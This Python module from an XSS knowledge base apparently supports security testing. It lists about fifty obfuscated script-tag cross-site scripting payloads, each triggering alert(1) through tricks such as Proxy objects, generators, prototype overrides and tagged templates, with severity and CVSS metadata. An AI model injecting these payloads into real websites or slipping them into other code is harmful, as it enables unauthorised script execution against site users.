#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Advanced Core Payloads - Part 3
"""

from typing import Dict

from ..models import PayloadEntry


ADVANCED_CORE_PAYLOADS_PART3: Dict[str, PayloadEntry] = {
    "advanced_105": PayloadEntry(
        payload='<script>Reflect.get(window,"alert")(1)</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_106": PayloadEntry(
        payload="<script>new Proxy(function(){},{apply:()=>alert(1)})()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_107": PayloadEntry(
        payload="<script>new Proxy([],{get:()=>alert(1)})[0]</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_108": PayloadEntry(
        payload="<script>Symbol.for(alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_109": PayloadEntry(
        payload="<script>Object.getOwnPropertySymbols(window)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_110": PayloadEntry(
        payload="<script>[...function*(){yield alert(1)}()]</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_111": PayloadEntry(
        payload="<script>async function*g(){yield alert(1)};g().next()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_112": PayloadEntry(
        payload="<script>(async function*(){yield alert(1)})().next()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_113": PayloadEntry(
        payload="<script>[Symbol.iterator]=()=>({next:()=>({done:!alert(1)})})</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_114": PayloadEntry(
        payload="<script>({[Symbol.iterator]:function*(){yield alert(1)}})</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_115": PayloadEntry(
        payload="<script>new WeakMap([[{},alert]]).get({})?.(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_116": PayloadEntry(
        payload="<script>new WeakSet([{valueOf:()=>alert(1)}])</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_117": PayloadEntry(
        payload="<script>new FinalizationRegistry(()=>alert(1)).register({},1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_118": PayloadEntry(
        payload="<script>BigInt.asIntN(1,alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_119": PayloadEntry(
        payload="<script>BigInt.asUintN(1,alert(1))</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_120": PayloadEntry(
        payload='<script>new Intl.DateTimeFormat("en",{get timeZone(){alert(1)}})</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_121": PayloadEntry(
        payload='<script>new Intl.NumberFormat("en",{get style(){alert(1)}})</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_122": PayloadEntry(
        payload="<script>Atomics.wait(new Int32Array(new SharedArrayBuffer(4)),0,0,0);alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_123": PayloadEntry(
        payload="<script>Error.prepareStackTrace=(e,s)=>alert(1);new Error().stack</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_124": PayloadEntry(
        payload='<script>Object.defineProperty(Error.prototype,"stack",{get:()=>alert(1)})</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_125": PayloadEntry(
        payload="<script>console.log=alert;console.log(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_126": PayloadEntry(
        payload='<script>Object.defineProperty(console,"log",{value:alert})</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_127": PayloadEntry(
        payload='<script>JSON.parse=()=>alert(1);JSON.parse("{}")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_128": PayloadEntry(
        payload="<script>JSON.stringify=()=>alert(1);JSON.stringify({})</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_129": PayloadEntry(
        payload="<script>Array.prototype.map=function(){alert(1)};[1].map()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_130": PayloadEntry(
        payload="<script>Array.prototype.forEach=function(){alert(1)};[1].forEach()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_131": PayloadEntry(
        payload="<script>Array.prototype.filter=function(){alert(1)};[1].filter()</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_132": PayloadEntry(
        payload='<script>String.prototype.replace=function(){alert(1)};"x".replace()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_133": PayloadEntry(
        payload='<script>String.prototype.split=function(){alert(1)};"x".split()</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_134": PayloadEntry(
        payload='<script>Object.prototype.toString=function(){alert(1)};({})+""</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_135": PayloadEntry(
        payload="<script>Object.prototype.valueOf=function(){alert(1)};+{}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_136": PayloadEntry(
        payload="<script>+{valueOf:()=>alert(1)}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_137": PayloadEntry(
        payload="<script>!{valueOf:()=>alert(1)}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_138": PayloadEntry(
        payload='<script>""+{toString:()=>alert(1)}</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_139": PayloadEntry(
        payload="<script>[...[alert(1)]]</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_140": PayloadEntry(
        payload="<script>({...{get x(){alert(1)}}}).x</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_141": PayloadEntry(
        payload="<script>Math.max(...[alert(1)])</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_142": PayloadEntry(
        payload="<script>[alert]=[alert];alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_143": PayloadEntry(
        payload="<script>({alert}={alert});alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_144": PayloadEntry(
        payload="<script>const[a=alert(1)]=[]</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_145": PayloadEntry(
        payload="<script>const{x=alert(1)}={}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_146": PayloadEntry(
        payload="<script>String.raw`${alert(1)}`</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_147": PayloadEntry(
        payload="<script>(x=>x)`${alert(1)}`</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_148": PayloadEntry(
        payload='<script>globalThis?.["alert"]?.(1)</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_149": PayloadEntry(
        payload="<script>[alert]?.[0]?.(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_150": PayloadEntry(
        payload="<script>(undefined??alert)(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_151": PayloadEntry(
        payload="<script>window.x??=alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_152": PayloadEntry(
        payload="<script>window.x||=alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_153": PayloadEntry(
        payload="<script>window.x&&=alert(1)</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_154": PayloadEntry(
        payload="<script>class X{#x=alert(1);constructor(){this.#x}};new X</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_155": PayloadEntry(
        payload="<script>class X{static #x=alert(1)}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_156": PayloadEntry(
        payload="<script>class X{static #x;static{this.#x=alert(1)}}</script>",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
    "advanced_157": PayloadEntry(
        payload='<script type="module">const{default:x}=await import("data:text/javascript,export default alert(1)")</script>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Advanced payload",
        tags=["advanced", "obfuscation"],
        waf_evasion=False,
    ),
}
